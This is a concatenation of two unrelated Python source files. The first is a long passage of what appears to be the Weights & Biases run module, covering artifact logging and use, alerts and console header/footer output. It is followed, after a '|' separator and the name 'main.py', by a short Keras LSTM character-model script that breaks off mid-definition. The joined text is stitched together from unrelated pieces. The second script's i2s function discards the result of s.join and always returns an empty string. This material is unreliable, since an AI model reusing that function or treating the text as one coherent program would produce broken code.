elif replacement_artifact_info is None and use_as is None:
wandb.termwarn(
f"Could not find {artifact_name} in launch artifact mapping. Searching for unique artifacts with sequence name: {artifact_name}"
)
sequence_name = artifact_name.split(":")[0].split("/")[-1]
unique_artifact_replacement_info = self._unique_launch_artifact_sequence_names.get(
sequence_name
)
if unique_artifact_replacement_info is not None:
new_name = unique_artifact_replacement_info.get("name")
entity = unique_artifact_replacement_info.get("entity")
project = unique_artifact_replacement_info.get("project")
if new_name is None or entity is None or project is None:
raise ValueError(
"Misconfigured artifact in launch config. Must include name, project and entity keys."
)
return f"{entity}/{project}/{new_name}"
else:
wandb.termwarn(
f"Could not find swappable artifact at key: {use_as}. Using {artifact_name}"
)
return artifact_name
wandb.termwarn(
f"Could not find {artifact_key_string} in launch artifact mapping. Using {artifact_name}"
)
return artifact_name
def _detach(self) -> None:
pass
def use_artifact(
self,
artifact_or_name: Union[str, public.Artifact, Artifact],
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
use_as: Optional[str] = None,
) -> Union[public.Artifact, Artifact]:
"""Declare an artifact as an input to a run.
Call `download` or `file` on the returned object to get the contents locally.
Arguments:
artifact_or_name: (str or Artifact) An artifact name.
May be prefixed with entity/project/. Valid names
can be in the following forms:
- name:version
- name:alias
- digest
You can also pass an Artifact object created by calling `wandb.Artifact`
type: (str, optional) The type of artifact to use.
aliases: (list, optional) Aliases to apply to this artifact
use_as: (string, optional) Optional string indicating what purpose the artifact was used with.
Will be shown in UI.
Returns:
An `Artifact` object.
"""
if self.offline:
raise TypeError("Cannot use artifact when in offline mode.")
r = self._run_obj
assert r is not None
api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
api.set_current_run_id(self.id)
if isinstance(artifact_or_name, str):
if self._launch_artifact_mapping:
name = self._swap_artifact_name(artifact_or_name, use_as)
else:
name = artifact_or_name
public_api = self._public_api()
artifact = public_api.artifact(type=type, name=name)
if type is not None and type != artifact.type:
raise ValueError(
"Supplied type {} does not match type {} of artifact {}".format(
type, artifact.type, artifact.name
)
)
artifact._use_as = use_as or artifact_or_name
if use_as:
if (
use_as in self._used_artifact_slots.keys()
and self._used_artifact_slots[use_as] != artifact.id
):
raise ValueError(
"Cannot call use_artifact with the same use_as argument more than once"
)
elif ":" in use_as or "/" in use_as:
raise ValueError(
"use_as cannot contain special characters ':' or '/'"
)
self._used_artifact_slots[use_as] = artifact.id
api.use_artifact(
artifact.id, use_as=use_as or artifact_or_name,
)
return artifact
else:
artifact = artifact_or_name
if aliases is None:
aliases = []
elif isinstance(aliases, str):
aliases = [aliases]
if isinstance(artifact_or_name, wandb.Artifact):
if use_as is not None:
wandb.termwarn(
"Indicating use_as is not supported when using an artifact with an instance of `wandb.Artifact`"
)
self._log_artifact(
artifact,
aliases=aliases,
is_user_created=True,
use_after_commit=True,
)
artifact.wait()
artifact._use_as = use_as or artifact.name
return artifact
elif isinstance(artifact, public.Artifact):
if (
self._launch_artifact_mapping
and artifact.name in self._launch_artifact_mapping.keys()
):
wandb.termwarn(
"Swapping artifacts is not supported when using an instance of `public.Artifact`. "
f"Using {artifact.name}."
)
artifact._use_as = use_as or artifact.name
api.use_artifact(
artifact.id, use_as=use_as or artifact._use_as or artifact.name
)
return artifact
else:
raise ValueError(
'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), '
"an instance of `wandb.Artifact`, or `wandb.Api().artifact()` to `use_artifact`" # noqa: E501
)
def log_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
) -> wandb_artifacts.Artifact:
"""Declare an artifact as an output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
Returns:
An `Artifact` object.
"""
return self._log_artifact(
artifact_or_path, name=name, type=type, aliases=aliases
)
def upsert_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Declare (or append to) a non-finalized artifact as output of a run.
Note that you must call run.finish_artifact() to finalize the artifact.
This is useful when distributed jobs need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name=name,
type=type,
aliases=aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
) -> wandb_artifacts.Artifact:
"""Finishes a non-finalized artifact as output of a run.
Subsequent "upserts" with the same distributed ID will result in a new version.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
distributed_id: Optional[str] = None,
finalize: bool = True,
is_user_created: bool = False,
use_after_commit: bool = False,
) -> wandb_artifacts.Artifact:
api = internal.Api()
if api.settings().get("anonymous") == "true":
wandb.termwarn(
"Artifacts logged anonymously cannot be claimed and expire after 7 days."
)
if not finalize and distributed_id is None:
raise TypeError("Must provide distributed_id if artifact is not finalize")
if aliases is not None:
if any(invalid in alias for alias in aliases for invalid in ["/", ":"]):
raise ValueError(
"Aliases must not contain any of the following characters: /, :"
)
artifact, aliases = self._prepare_artifact(
artifact_or_path, name, type, aliases
)
artifact.distributed_id = distributed_id
self._assert_can_log_artifact(artifact)
if self._backend and self._backend.interface:
if not self._settings._offline:
future = self._backend.interface.communicate_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
else:
self._backend.interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
elif self._internal_run_interface:
self._internal_run_interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
return artifact
def _public_api(self, overrides: Optional[Dict[str, str]] = None) -> PublicApi:
overrides = {"run": self.id}
run_obj = self._run_obj
if run_obj is not None:
overrides["entity"] = run_obj.entity
overrides["project"] = run_obj.project
return public.Api(overrides)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact) -> None: # type: ignore
if not self._settings._offline:
try:
public_api = self._public_api()
expected_type = public.Artifact.expected_type(
public_api.client,
artifact.name,
public_api.settings["entity"],
public_api.settings["project"],
)
except requests.exceptions.RequestException:
# Just return early if there is a network error. This is
# ok, as this function is intended to help catch an invalid
# type early, but not a hard requirement for valid operation.
return
if expected_type is not None and artifact.type != expected_type:
raise ValueError(
"Expected artifact type {}, got {}".format(
expected_type, artifact.type
)
)
def _prepare_artifact(
self,
artifact_or_path: Union[wandb_artifacts.Artifact, str],
name: Optional[str] = None,
type: Optional[str] = None,
aliases: Optional[List[str]] = None,
) -> Tuple[wandb_artifacts.Artifact, List[str]]:
aliases = aliases or ["latest"]
if isinstance(artifact_or_path, str):
if name is None:
name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
artifact = wandb.Artifact(name, type)
if os.path.isfile(artifact_or_path):
artifact.add_file(artifact_or_path)
elif os.path.isdir(artifact_or_path):
artifact.add_dir(artifact_or_path)
elif "://" in artifact_or_path:
artifact.add_reference(artifact_or_path)
else:
raise ValueError(
"path must be a file, directory or external"
"reference like s3://bucket/path"
)
else:
artifact = artifact_or_path
if not isinstance(artifact, wandb.Artifact):
raise ValueError(
"You must pass an instance of wandb.Artifact or a "
"valid file path to log_artifact"
)
if isinstance(aliases, str):
aliases = [aliases]
artifact.finalize()
return artifact, aliases
def alert(
self,
title: str,
text: str,
level: Union[str, "AlertLevel"] = None,
wait_duration: Union[int, float, timedelta, None] = None,
) -> None:
"""Launch an alert with the given title and text.
Arguments:
title: (str) The title of the alert, must be less than 64 characters long.
text: (str) The text body of the alert.
level: (str or wandb.AlertLevel, optional) The alert level to use, either: `INFO`, `WARN`, or `ERROR`.
wait_duration: (int, float, or timedelta, optional) The time to wait (in seconds) before sending another
alert with this title.
"""
level = level or wandb.AlertLevel.INFO
level_str: str = level.value if isinstance(level, wandb.AlertLevel) else level
if level_str not in {lev.value for lev in wandb.AlertLevel}:
raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
wait_duration = wait_duration or timedelta(minutes=1)
if isinstance(wait_duration, int) or isinstance(wait_duration, float):
wait_duration = timedelta(seconds=wait_duration)
elif not callable(getattr(wait_duration, "total_seconds", None)):
raise ValueError(
"wait_duration must be an int, float, or datetime.timedelta"
)
wait_duration = int(wait_duration.total_seconds() * 1000)
if self._backend and self._backend.interface:
self._backend.interface.publish_alert(title, text, level_str, wait_duration)
def __enter__(self) -> "Run":
return self
def __exit__(
self,
exc_type: Type[BaseException],
exc_val: BaseException,
exc_tb: TracebackType,
) -> bool:
exit_code = 0 if exc_type is None else 1
self.finish(exit_code)
return exc_type is None
def mark_preempting(self) -> None:
"""Marks this run as preempting.
Also tells the internal process to immediately report this to server.
"""
if self._backend and self._backend.interface:
self._backend.interface.publish_preempting()
# ------------------------------------------------------------------------------
# HEADER
# ------------------------------------------------------------------------------
# Note: All the header methods are static methods since we want to share the printing logic
# with the service execution path that doesn't have acess to the run instance
@staticmethod
def _header(
check_version: Optional["CheckVersionResponse"] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
# printer = printer or get_printer(settings._jupyter)
Run._header_version_check_info(
check_version, settings=settings, printer=printer
)
Run._header_wandb_version_info(settings=settings, printer=printer)
Run._header_sync_info(settings=settings, printer=printer)
Run._header_run_info(settings=settings, printer=printer)
@staticmethod
def _header_version_check_info(
check_version: Optional["CheckVersionResponse"] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if not check_version or settings._offline:
return
# printer = printer or get_printer(settings._jupyter)
if check_version.delete_message:
printer.display(check_version.delete_message, status="error")
elif check_version.yank_message:
printer.display(check_version.yank_message, status="warn")
printer.display(
check_version.upgrade_message, off=not check_version.upgrade_message
)
@staticmethod
def _header_wandb_version_info(
*, settings: "Settings", printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if settings.quiet or settings.silent:
return
# printer = printer or get_printer(settings._jupyter)
printer.display(f"Tracking run with wandb version {wandb.__version__}")
@staticmethod
def _header_sync_info(
*, settings: "Settings", printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
# printer = printer or get_printer(settings._jupyter)
if settings._offline:
printer.display(
[
f"W&B syncing is set to {printer.code('`offline`')} in this directory. ",
f"Run {printer.code('`wandb online`')} or set {printer.code('WANDB_MODE=online')} "
"to enable cloud syncing.",
]
)
else:
info = [f"Run data is saved locally in {printer.files(settings.sync_dir)}"]
if not printer._html:
info.append(
f"Run {printer.code('`wandb offline`')} to turn off syncing."
)
printer.display(info, off=settings.quiet or settings.silent)
@staticmethod
def _header_run_info(
*, settings: "Settings", printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if settings._offline or settings.silent:
return
run_url = settings.run_url
project_url = settings.project_url
sweep_url = settings.sweep_url
run_state_str = "Resuming run" if settings.resumed else "Syncing run"
run_name = settings.run_name
# printer = printer or get_printer(settings._jupyter)
if printer._html:
if not wandb.jupyter.maybe_display():
run_line = f"<strong>{printer.link(run_url, run_name)}</strong>"
project_line, sweep_line = "", ""
# TODO(settings): make settings the source of truth
if not wandb.jupyter.quiet():
doc_html = printer.link("https://wandb.me/run", "docs")
project_html = printer.link(project_url, "Weights & Biases")
project_line = f"to {project_html} ({doc_html})"
if sweep_url:
sweep_line = (
f"Sweep page: {printer.link(sweep_url, sweep_url)}"
)
printer.display(
[f"{run_state_str} {run_line} {project_line}", sweep_line]
)
else:
printer.display(f"{run_state_str} {printer.name(run_name)}")
if not settings.quiet:
printer.display(
f'{printer.emoji("star")} View project at {printer.link(project_url)}'
)
if sweep_url:
printer.display(
f'{printer.emoji("broom")} View sweep at {printer.link(sweep_url)}'
)
printer.display(
f'{printer.emoji("rocket")} View run at {printer.link(run_url)}'
)
# TODO(settings) use `wandb_settings` (if self.settings.anonymous == "true":)
if Api().api.settings().get("anonymous") == "true":
printer.display(
"Do NOT share these links with anyone. They can be used to claim your runs.",
status="warn",
)
# ------------------------------------------------------------------------------
# FOOTER
# ------------------------------------------------------------------------------
# Note: All the footer methods are static methods since we want to share the printing logic
# with the service execution path that doesn't have acess to the run instance
@staticmethod
def _footer(
sampled_history: Optional["SampledHistoryResponse"] = None,
final_summary: Optional["GetSummaryResponse"] = None,
poll_exit_response: Optional[PollExitResponse] = None,
check_version: Optional["CheckVersionResponse"] = None,
reporter: Optional[Reporter] = None,
quiet: Optional[bool] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
Run._footer_history_summary_info(
history=sampled_history,
summary=final_summary,
quiet=quiet,
settings=settings,
printer=printer,
)
Run._footer_sync_info(
pool_exit_response=poll_exit_response,
quiet=quiet,
settings=settings,
printer=printer,
)
Run._footer_log_dir_info(quiet=quiet, settings=settings, printer=printer)
Run._footer_version_check_info(
check_version=check_version, quiet=quiet, settings=settings, printer=printer
)
Run._footer_local_warn(
poll_exit_response=poll_exit_response,
quiet=quiet,
settings=settings,
printer=printer,
)
Run._footer_reporter_warn_err(
reporter=reporter, quiet=quiet, settings=settings, printer=printer
)
@staticmethod
def _footer_exit_status_info(
exit_code: Optional[int],
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if settings.silent:
return
status = "(success)." if not exit_code else f"(failed {exit_code})."
info = [
f"Waiting for W&B process to finish... {printer.status(status, bool(exit_code))}"
]
if not settings._offline and exit_code:
info.append(f"Press {printer.abort()} to abort syncing.")
printer.display(f'{" ".join(info)}')
# fixme: Temporary hack until we move to rich which allows multiple spinners
@staticmethod
def _footer_file_pusher_status_info(
poll_exit_responses: Optional[
Union[PollExitResponse, Dict[str, Optional[PollExitResponse]]]
] = None,
*,
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if not poll_exit_responses:
return
if isinstance(poll_exit_responses, PollExitResponse):
Run._footer_single_run_file_pusher_status_info(
poll_exit_responses, printer=printer
)
elif isinstance(poll_exit_responses, dict):
poll_exit_responses_list = [
response for response in poll_exit_responses.values()
]
assert all(
response is None or isinstance(response, PollExitResponse)
for response in poll_exit_responses_list
)
if len(poll_exit_responses_list) == 0:
return
elif len(poll_exit_responses_list) == 1:
Run._footer_single_run_file_pusher_status_info(
poll_exit_responses_list[0], printer=printer
)
else:
Run._footer_multiple_runs_file_pusher_status_info(
poll_exit_responses_list, printer=printer
)
else:
raise ValueError(
f"Got the type `{type(poll_exit_responses)}` for `poll_exit_responses`. "
"Expected either None, PollExitResponse or a Dict[str, Union[PollExitResponse, None]]"
)
@staticmethod
def _footer_single_run_file_pusher_status_info(
poll_exit_response: Optional[PollExitResponse] = None,
*,
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
# todo: is this same as settings._offline?
if not poll_exit_response:
return
progress = poll_exit_response.pusher_stats
done = poll_exit_response.done
megabyte = wandb.util.POW_2_BYTES[2][1]
line = (
f"{progress.uploaded_bytes / megabyte :.3f} MB of {progress.total_bytes / megabyte:.3f} MB uploaded "
f"({progress.deduped_bytes / megabyte:.3f} MB deduped)\r"
)
percent_done = (
1.0
if progress.total_bytes == 0
else progress.uploaded_bytes / progress.total_bytes
)
printer.progress_update(line, percent_done)
if done:
printer.progress_close()
dedupe_fraction = (
progress.deduped_bytes / float(progress.total_bytes)
if progress.total_bytes > 0
else 0
)
if dedupe_fraction > 0.01:
printer.display(
f"W&B sync reduced upload amount by {dedupe_fraction * 100:.1f}% "
)
@staticmethod
def _footer_multiple_runs_file_pusher_status_info(
poll_exit_responses: List[Optional[PollExitResponse]],
*,
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
# todo: is this same as settings._offline?
if not all(poll_exit_responses):
return
megabyte = wandb.util.POW_2_BYTES[2][1]
total_files = sum(
[
sum(
[
response.file_counts.wandb_count,
response.file_counts.media_count,
response.file_counts.artifact_count,
response.file_counts.other_count,
]
)
for response in poll_exit_responses
if response and response.file_counts
]
)
uploaded = sum(
[
response.pusher_stats.uploaded_bytes
for response in poll_exit_responses
if response and response.pusher_stats
]
)
total = sum(
[
response.pusher_stats.total_bytes
for response in poll_exit_responses
if response and response.pusher_stats
]
)
line = f"Processing {len(poll_exit_responses)} runs with {total_files} files ({uploaded/megabyte :.2f} MB/{total/megabyte :.2f} MB)\r"
# line = "{}{:<{max_len}}\r".format(line, " ", max_len=(80 - len(line)))
printer.progress_update(line) # type: ignore [call-arg]
done = all(
[
poll_exit_response.done
for poll_exit_response in poll_exit_responses
if poll_exit_response
]
)
if done:
printer.progress_close()
@staticmethod
def _footer_sync_info(
pool_exit_response: Optional[PollExitResponse] = None,
quiet: Optional[bool] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if settings.silent:
return
# printer = printer or get_printer(settings._jupyter)
if settings._offline:
printer.display(
[
"You can sync this run to the cloud by running:",
printer.code(f"wandb sync {settings.sync_dir}"),
],
off=(quiet or settings.quiet),
)
else:
info = [
f"Synced {printer.name(settings.run_name)}: {printer.link(settings.run_url)}"
]
if pool_exit_response and pool_exit_response.file_counts:
logger.info("logging synced files")
file_counts = pool_exit_response.file_counts
info.append(
f"Synced {file_counts.wandb_count} W&B file(s), {file_counts.media_count} media file(s), "
f"{file_counts.artifact_count} artifact file(s) and {file_counts.other_count} other file(s)",
)
printer.display(info)
@staticmethod
def _footer_log_dir_info(
quiet: Optional[bool] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if (quiet or settings.quiet) or settings.silent:
return
log_dir = settings.log_user or settings.log_internal
if log_dir:
# printer = printer or get_printer(settings._jupyter)
log_dir = os.path.dirname(log_dir.replace(os.getcwd(), "."))
printer.display(f"Find logs at: {printer.files(log_dir)}",)
@staticmethod
def _footer_history_summary_info(
history: Optional["SampledHistoryResponse"] = None,
summary: Optional["GetSummaryResponse"] = None,
quiet: Optional[bool] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if (quiet or settings.quiet) or settings.silent:
return
# printer = printer or get_printer(settings._jupyter)
panel = []
# Render history if available
if history:
logger.info("rendering history")
sampled_history = {
item.key: wandb.util.downsample(
item.values_float or item.values_int, 40
)
for item in history.item
if not item.key.startswith("_")
}
history_rows = []
for key, values in sorted(sampled_history.items()):
if any((not isinstance(value, numbers.Number) for value in values)):
continue
sparkline = printer.sparklines(values)
if sparkline:
history_rows.append([key, sparkline])
if history_rows:
history_grid = printer.grid(history_rows, "Run history:",)
panel.append(history_grid)
# Render summary if available
if summary:
final_summary = {
item.key: json.loads(item.value_json)
for item in summary.item
if not item.key.startswith("_")
}
logger.info("rendering summary")
summary_rows = []
for key, value in sorted(final_summary.items()):
# arrays etc. might be too large. for now we just don't print them
if isinstance(value, str):
value = value[:20] + "..." * (len(value) >= 20)
summary_rows.append([key, value])
elif isinstance(value, numbers.Number):
value = round(value, 5) if isinstance(value, float) else value
summary_rows.append([key, str(value)])
else:
continue
if summary_rows:
summary_grid = printer.grid(summary_rows, "Run summary:",)
panel.append(summary_grid)
if panel:
printer.display(printer.panel(panel))
@staticmethod
def _footer_local_warn(
poll_exit_response: Optional[PollExitResponse] = None,
quiet: Optional[bool] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if (quiet or settings.quiet) or settings.silent:
return
if settings._offline:
return
if not poll_exit_response or not poll_exit_response.local_info:
return
if settings.is_local:
local_info = poll_exit_response.local_info
latest_version, out_of_date = local_info.version, local_info.out_of_date
if out_of_date:
# printer = printer or get_printer(settings._jupyter)
printer.display(
f"Upgrade to the {latest_version} version of W&B Local to get the latest features. "
f"Learn more: {printer.link('https://wandb.me/local-upgrade')}",
status="warn",
)
@staticmethod
def _footer_version_check_info(
check_version: Optional["CheckVersionResponse"] = None,
quiet: Optional[bool] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if not check_version:
return
if settings._offline:
return
if (quiet or settings.quiet) or settings.silent:
return
# printer = printer or get_printer(settings._jupyter)
if check_version.delete_message:
printer.display(check_version.delete_message, status="error")
elif check_version.yank_message:
printer.display(check_version.yank_message, status="warn")
# only display upgrade message if packages are bad
package_problem = check_version.delete_message or check_version.yank_message
if package_problem and check_version.upgrade_message:
printer.display(check_version.upgrade_message)
@staticmethod
def _footer_reporter_warn_err(
reporter: Optional[Reporter] = None,
quiet: Optional[bool] = None,
*,
settings: "Settings",
printer: Union["PrinterTerm", "PrinterJupyter"],
) -> None:
if (quiet or settings.quiet) or settings.silent:
return
if not reporter:
return
# printer = printer or get_printer(settings._jupyter)
warning_lines = reporter.warning_lines
if warning_lines:
warnings = ["Warnings:"] + [f"{line}" for line in warning_lines]
if len(warning_lines) < reporter.warning_count:
warnings.append("More warnings...")
printer.display(warnings)
error_lines = reporter.error_lines
if error_lines:
errors = ["Errors:"] + [f"{line}" for line in error_lines]
if len(error_lines) < reporter.error_count:
errors.append("More errors...")
printer.display(errors)
# We define this outside of the run context to support restoring before init
def restore(
name: str,
run_path: Optional[str] = None,
replace: bool = False,
root: Optional[str] = None,
) -> Union[None, TextIO]:
"""Downloads the specified file from cloud storage.
File is placed into the current directory or run directory.
By default will only download the file if it doesn't already exist.
Arguments:
name: the name of the file
run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
if wandb.init has not been called, this is required.
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
Returns:
None if it can't find the file, otherwise a file object open for reading
Raises:
wandb.CommError: if we can't connect to the wandb backend
ValueError: if the file is not found or can't find run_path
"""
is_disabled = wandb.run is not None and wandb.run.disabled
run = None if is_disabled else wandb.run
if run_path is None:
if run is not None:
run_path = run.path
else:
raise ValueError(
"run_path required when calling wandb.restore before wandb.init"
)
if root is None:
if run is not None:
root = run.dir
api = public.Api()
api_run = api.run(run_path)
if root is None:
root = os.getcwd()
path = os.path.join(root, name)
if os.path.exists(path) and replace is False:
return open(path, "r")
if is_disabled:
return None
files = api_run.files([name])
if len(files) == 0:
return None
# if the file does not exist, the file has an md5 of 0
if files[0].md5 == "0":
raise ValueError("File {} not found in {}.".format(name, run_path or root))
return files[0].download(root=root, replace=True)
# propigate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
def finish(exit_code: int = None, quiet: bool = None) -> None:
"""Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process.
We automatically call this method when your script exits.
Arguments:
exit_code: Set to something other than 0 to mark a run as failed
quiet: Set to true to minimize log output
"""
if wandb.run:
wandb.run.finish(exit_code=exit_code, quiet=quiet)
# propagate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
class _LazyArtifact(ArtifactInterface):
_api: PublicApi
_instance: Optional[ArtifactInterface] = None
_future: Any
def __init__(self, api: PublicApi, future: Any):
self._api = api
self._future = future
def _assert_instance(self) -> ArtifactInterface:
if not self._instance:
raise ValueError(
"Must call wait() before accessing logged artifact properties"
)
return self._instance
def __getattr__(self, item: str) -> Any:
self._assert_instance()
return getattr(self._instance, item)
def wait(self) -> ArtifactInterface:
if not self._instance:
resp = self._future.get().response.log_artifact_response
if resp.error_message:
raise ValueError(resp.error_message)
self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
assert isinstance(
self._instance, ArtifactInterface
), "Insufficient permissions to fetch Artifact with id {} from {}".format(
resp.artifact_id, self._api.client.app_url
)
return self._instance
@property
def id(self) -> Optional[str]:
return self._assert_instance().id
@property
def version(self) -> str:
return self._assert_instance().version
@property
def name(self) -> str:
return self._assert_instance().name
@property
def type(self) -> str:
return self._assert_instance().type
@property
def entity(self) -> str:
return self._assert_instance().entity
@property
def project(self) -> str:
return self._assert_instance().project
@property
def manifest(self) -> "ArtifactManifest":
return self._assert_instance().manifest
@property
def digest(self) -> str:
return self._assert_instance().digest
@property
def state(self) -> str:
return self._assert_instance().state
@property
def size(self) -> int:
return self._assert_instance().size
@property
def commit_hash(self) -> str:
return self._assert_instance().commit_hash
@property
def description(self) -> Optional[str]:
return self._assert_instance().description
@description.setter
def description(self, desc: Optional[str]) -> None:
self._assert_instance().description = desc
@property
def metadata(self) -> dict:
return self._assert_instance().metadata
@metadata.setter
def metadata(self, metadata: dict) -> None:
self._assert_instance().metadata = metadata
@property
def aliases(self) -> List[str]:
return self._assert_instance().aliases
@aliases.setter
def aliases(self, aliases: List[str]) -> None:
self._assert_instance().aliases = aliases
def used_by(self) -> List["wandb.apis.public.Run"]:
return self._assert_instance().used_by()
def logged_by(self) -> "wandb.apis.public.Run":
return self._assert_instance().logged_by()
# Commenting this block out since this code is unreachable since LocalArtifact
# overrides them and therefore untestable.
# Leaving behind as we may want to support these in the future.
# def new_file(self, name: str, mode: str = "w") -> Any: # TODO: Refine Type
# return self._assert_instance().new_file(name, mode)
# def add_file(
# self,
# local_path: str,
# name: Optional[str] = None,
# is_tmp: Optional[bool] = False,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_file(local_path, name, is_tmp)
# def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
# return self._assert_instance().add_dir(local_path, name)
# def add_reference(
# self,
# uri: Union["ArtifactEntry", str],
# name: Optional[str] = None,
# checksum: bool = True,
# max_objects: Optional[int] = None,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_reference(uri, name, checksum, max_objects)
# def add(self, obj: "WBValue", name: str) -> Any: # TODO: Refine Type
# return self._assert_instance().add(obj, name)
def get_path(self, name: str) -> "ArtifactEntry":
return self._assert_instance().get_path(name)
def get(self, name: str) -> "WBValue":
return self._assert_instance().get(name)
def download(self, root: Optional[str] = None, recursive: bool = False) -> str:
return self._assert_instance().download(root, recursive)
def checkout(self, root: Optional[str] = None) -> str:
return self._assert_instance().checkout(root)
def verify(self, root: Optional[str] = None) -> Any:
return self._assert_instance().verify(root)
def save(self) -> None:
return self._assert_instance().save()
def delete(self) -> None:
return self._assert_instance().delete()
|
main.py
|
# encoding: utf-8
#这里放置主程序以及IO
from numpy import *
from utils.tools import loadvoc
from keras.models import Sequential,load_model,Model
from keras.layers import Input, Embedding, LSTM, Dense, merge, RepeatVector,TimeDistributed,Masking
from keras.optimizers import SGD,Adam
from keras.utils.np_utils import to_categorical
import threading
import time
rlock = threading.RLock()
#编码与解码文字
#i2c, c2i = loadvoc()
ss="1234567890-=qwertyuiopasdfghjkl;'zxcvbnm,."
i2c={}
c2i={}
for i in range(len(ss)):
i2c[i]=ss[i]
c2i[ss[i]]=i
#模型参数设置
VOC = len(i2c) #最大词汇数目
SEN = 20 #句子最大长度
INPUT=['',''] #输入的句子缓存
SPEAK_OUTPUT='' #输出的言语缓存
#将句子转化成数字
def s2i(s,l=SEN):
idx=zeros([1,l],dtype=int32)
for i in range(min(l,len(s))):
idx[0,i]=c2i.get(s[i],0)
return idx
def i2s(idx):
s=''
for i in idx[0,:]:
if i>0:
s.join(i2c.get(i,''))
return s
#定义主模型
#输入层
main_input = Input(shape=(SEN,), dtype='int32', name='main_input')
#文字矢量化层
x = Masking(mask_value=0)(main_input)
x = Embedding(output_dim=VOC, input_dim=VOC, input_length=SEN)(x)
#长短记忆层
lstm_out = LSTM(128)(x)
#生物钟,当前时间信息输入[hr,min]
